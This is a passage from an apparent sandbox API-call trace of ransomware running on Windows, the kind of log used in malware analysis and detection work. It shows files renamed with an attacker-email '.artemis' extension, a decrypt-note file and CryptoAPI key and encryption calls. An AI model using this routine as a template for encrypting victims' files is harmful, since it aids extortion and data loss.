(bstr="9C354B42") returned 0x10 [0193.551] SysStringByteLen (bstr="9C354B42") returned 0x10 [0193.551] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", nBufferLength=0x105, lpBuffer=0x71eeda8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpFilePart=0x0) returned 0x7a [0193.551] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x71eeda8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0xa5 [0193.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef208) returned 1 [0193.551] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), fInfoLevelId=0x0, lpFileInformation=0x71ef284 | out: lpFileInformation=0x71ef284*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0193.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef204) returned 1 [0193.551] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.id-9c354b42.[khalate@tutanota.com].artemis")) returned 0 [0193.553] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", nBufferLength=0x105, lpBuffer=0x71eee4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpFilePart=0x0) returned 0x28 [0193.553] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", nBufferLength=0x105, lpBuffer=0x71eee44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpFilePart=0x0) returned 0x28 [0193.553] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x71eee4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", lpFilePart=0x0) returned 0x2e [0193.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef2ac) returned 1 [0193.553] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x71ef328 | out: lpFileInformation=0x71ef328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62089c0, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x62089c0, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x622eb20, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0193.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef2a8) returned 1 [0193.553] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", nBufferLength=0x105, lpBuffer=0x71eedc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpFilePart=0x0) returned 0x28 [0193.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef274) returned 1 [0193.554] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), fInfoLevelId=0x0, lpFileInformation=0x3571d78 | out: lpFileInformation=0x3571d78*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14)) returned 1 [0193.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef270) returned 1 [0193.554] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", nBufferLength=0x105, lpBuffer=0x71eecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpFilePart=0x0) returned 0x28 [0193.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef1a8) returned 1 [0193.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x348 [0193.554] GetFileType (hFile=0x348) returned 0x1 [0193.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef1a4) returned 1 [0193.554] GetFileType (hFile=0x348) returned 0x1 [0193.554] GetFileSize (in: hFile=0x348, lpFileSizeHigh=0x71ef2b0 | out: lpFileSizeHigh=0x71ef2b0*=0x0) returned 0x14 [0193.555] ReadFile (in: hFile=0x348, lpBuffer=0x3571f30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x71ef25c, lpOverlapped=0x0 | out: lpBuffer=0x3571f30*, lpNumberOfBytesRead=0x71ef25c*=0x14, lpOverlapped=0x0) returned 1 [0193.556] CloseHandle (hObject=0x348) returned 1 [0193.556] CryptAcquireContextW (in: phProv=0x71ef1fc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x71ef1fc*=0x7a8cb0) returned 1 [0193.557] CryptGenRandom (in: hProv=0x7a8cb0, dwLen=0x10, pbBuffer=0x35ad2fc | out: pbBuffer=0x35ad2fc) returned 1 [0195.613] CryptImportKey (in: hProv=0x7a8cb0, pbData=0x34d81f8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x71ef1cc | out: phKey=0x71ef1cc*=0x77af30) returned 1 [0195.613] CryptContextAddRef (hProv=0x7a8cb0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0195.613] CryptContextAddRef (hProv=0x7a8cb0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0195.613] CryptDuplicateKey (in: hKey=0x77af30, pdwReserved=0x0, dwFlags=0x0, phKey=0x71ef1bc | out: phKey=0x71ef1bc*=0x77adf0) returned 1 [0195.613] CryptContextAddRef (hProv=0x7a8cb0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0195.613] CryptSetKeyParam (hKey=0x77adf0, dwParam=0x4, pbData=0x34d82d8*=0x1, dwFlags=0x0) returned 1 [0195.613] CryptSetKeyParam (hKey=0x77adf0, dwParam=0x1, pbData=0x34d82a4, dwFlags=0x0) returned 1 [0195.613] CryptEncrypt (in: hKey=0x77adf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34d82e8*, pdwDataLen=0x71ef228*=0x20, dwBufLen=0x20 | out: pbData=0x34d82e8*, pdwDataLen=0x71ef228*=0x20) returned 1 [0195.613] CryptEncrypt (in: hKey=0x77adf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34d832c*, pdwDataLen=0x71ef230*=0x0, dwBufLen=0x10 | out: pbData=0x34d832c*, pdwDataLen=0x71ef230*=0x10) returned 1 [0195.615] CryptDestroyKey (hKey=0x77af30) returned 1 [0195.615] CryptReleaseContext (hProv=0x7a8cb0, dwFlags=0x0) returned 1 [0195.615] CryptReleaseContext (hProv=0x7a8cb0, dwFlags=0x0) returned 1 [0195.615] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", nBufferLength=0x105, lpBuffer=0x71eeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpFilePart=0x0) returned 0x28 [0195.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef194) returned 1 [0195.615] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0195.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71edfd0) returned 1 [0195.618] CoTaskMemAlloc (cb=0x20c) returned 0x74f320 [0195.619] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x74f320 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0195.619] CoTaskMemFree (pv=0x74f320) [0195.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x71eec88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0195.619] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef1d0 | out: ppv=0x71ef1d0*=0x72015c) returned 0x0 [0195.619] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef1c8 | out: pAptType=0x71ef1c8*=1) returned 0x0 [0195.619] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef1cc | out: ppvObject=0x71ef1cc*=0x0) returned 0x80004002 [0195.619] IUnknown:Release (This=0x72015c) returned 0x1 [0195.621] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eeb38 | out: ppv=0x71eeb38*=0x6736e18) returned 0x0 [0195.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eed50 | out: ppvObject=0x71eed50*=0x0) returned 0x80004002 [0195.622] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e18, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eed64 | out: ppvObject=0x71eed64*=0x67388c0) returned 0x0 [0195.622] WbemDefPath:IUnknown:Release (This=0x6736e18) returned 0x0 [0195.622] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee984 | out: ppvObject=0x71ee984*=0x67388c0) returned 0x0 [0195.622] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee940 | out: ppvObject=0x71ee940*=0x0) returned 0x80004002 [0195.622] WbemDefPath:IUnknown:AddRef (This=0x67388c0) returned 0x3 [0195.622] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee29c | out: ppvObject=0x71ee29c*=0x0) returned 0x80004002 [0195.622] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee24c | out: ppvObject=0x71ee24c*=0x0) returned 0x80004002 [0195.622] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee258 | out: ppvObject=0x71ee258*=0x9820f58) returned 0x0 [0195.622] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820f58, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee260 | out: pCid=0x71ee260*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0195.622] WbemDefPath:IUnknown:Release (This=0x9820f58) returned 0x3 [0195.622] CoGetContextToken (in: pToken=0x71ee2b8 | out: pToken=0x71ee2b8) returned 0x0 [0195.622] CoGetContextToken (in: pToken=0x71ee6c0 | out: pToken=0x71ee6c0) returned 0x0 [0195.622] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee750 | out: ppvObject=0x71ee750*=0x0) returned 0x80004002 [0195.622] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x2 [0195.622] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x1 [0195.622] CoGetContextToken (in: pToken=0x71ef048 | out: pToken=0x71ef048) returned 0x0 [0195.622] CoGetContextToken (in: pToken=0x71eefa8 | out: pToken=0x71eefa8) returned 0x0 [0195.622] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x71ef078*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71ef074 | out: ppvObject=0x71ef074*=0x67388c0) returned 0x0 [0195.622] WbemDefPath:IUnknown:AddRef (This=0x67388c0) returned 0x3 [0195.622] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x2 [0195.623] WbemDefPath:IWbemPath:SetText (This=0x67388c0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0195.623] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67388c0, puCount=0x71ef1fc | out: puCount=0x71ef1fc*=0x0) returned 0x0 [0195.623] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x71ef1f8*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1f8*=0x20, pszText=0x0) returned 0x0 [0195.623] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x71ef1f8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1f8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0195.623] WbemDefPath:IWbemPath:GetInfo (in: This=0x67388c0, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0195.623] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67388c0, puCount=0x71ef1fc | out: puCount=0x71ef1fc*=0x0) returned 0x0 [0195.623] WbemDefPath:IWbemPath:GetInfo (in: This=0x67388c0, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0195.623] WbemDefPath:IWbemPath:GetInfo (in: This=0x67388c0, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0195.623] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67388c0, puCount=0x71ef17c | out: puCount=0x71ef17c*=0x0) returned 0x0 [0195.623] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x71ef168 | out: puCount=0x71ef168*=0x2) returned 0x0 [0195.623] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef164*=0x0, pszText=0x0 | out: puBuffLength=0x71ef164*=0xf, pszText=0x0) returned 0x0 [0195.623] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef164*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef164*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.623] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef118 | out: ppv=0x71ef118*=0x72015c) returned 0x0 [0195.623] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef110 | out: pAptType=0x71ef110*=1) returned 0x0 [0195.623] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef114 | out: ppvObject=0x71ef114*=0x0) returned 0x80004002 [0195.623] IUnknown:Release (This=0x72015c) returned 0x1 [0195.624] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eea80 | out: ppv=0x71eea80*=0x67370e8) returned 0x0 [0195.624] WbemDefPath:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eec98 | out: ppvObject=0x71eec98*=0x0) returned 0x80004002 [0195.624] WbemDefPath:IClassFactory:CreateInstance (in: This=0x67370e8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecac | out: ppvObject=0x71eecac*=0x6738700) returned 0x0 [0195.624] WbemDefPath:IUnknown:Release (This=0x67370e8) returned 0x0 [0195.624] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8cc | out: ppvObject=0x71ee8cc*=0x6738700) returned 0x0 [0195.624] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee888 | out: ppvObject=0x71ee888*=0x0) returned 0x80004002 [0195.624] WbemDefPath:IUnknown:AddRef (This=0x6738700) returned 0x3 [0195.624] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee1e4 | out: ppvObject=0x71ee1e4*=0x0) returned 0x80004002 [0195.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee194 | out: ppvObject=0x71ee194*=0x0) returned 0x80004002 [0195.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee1a0 | out: ppvObject=0x71ee1a0*=0x9820f88) returned 0x0 [0195.625] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820f88, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee1a8 | out: pCid=0x71ee1a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0195.625] WbemDefPath:IUnknown:Release (This=0x9820f88) returned 0x3 [0195.625] CoGetContextToken (in: pToken=0x71ee200 | out: pToken=0x71ee200) returned 0x0 [0195.625] CoGetContextToken (in: pToken=0x71ee608 | out: pToken=0x71ee608) returned 0x0 [0195.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee698 | out: ppvObject=0x71ee698*=0x0) returned 0x80004002 [0195.625] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x2 [0195.625] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x1 [0195.625] CoGetContextToken (in: pToken=0x71eef90 | out: pToken=0x71eef90) returned 0x0 [0195.625] CoGetContextToken (in: pToken=0x71eeef0 | out: pToken=0x71eeef0) returned 0x0 [0195.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x71eefc0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71eefbc | out: ppvObject=0x71eefbc*=0x6738700) returned 0x0 [0195.625] WbemDefPath:IUnknown:AddRef (This=0x6738700) returned 0x3 [0195.625] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x2 [0195.625] WbemDefPath:IWbemPath:SetText (This=0x6738700, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0195.625] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738700, puCount=0x71ef140 | out: puCount=0x71ef140*=0x2) returned 0x0 [0195.625] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x71ef13c*=0x0, pszText=0x0 | out: puBuffLength=0x71ef13c*=0xf, pszText=0x0) returned 0x0 [0195.625] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x71ef13c*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef13c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.625] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef140 | out: ppv=0x71ef140*=0x72015c) returned 0x0 [0195.625] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef138 | out: pAptType=0x71ef138*=1) returned 0x0 [0195.625] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef13c | out: ppvObject=0x71ef13c*=0x0) returned 0x80004002 [0195.625] IUnknown:Release (This=0x72015c) returned 0x1 [0195.626] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eed60 | out: ppv=0x71eed60*=0x672f418) returned 0x0 [0195.626] WbemLocator:IUnknown:QueryInterface (in: This=0x672f418, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eef78 | out: ppvObject=0x71eef78*=0x0) returned 0x80004002 [0195.626] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f418, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, 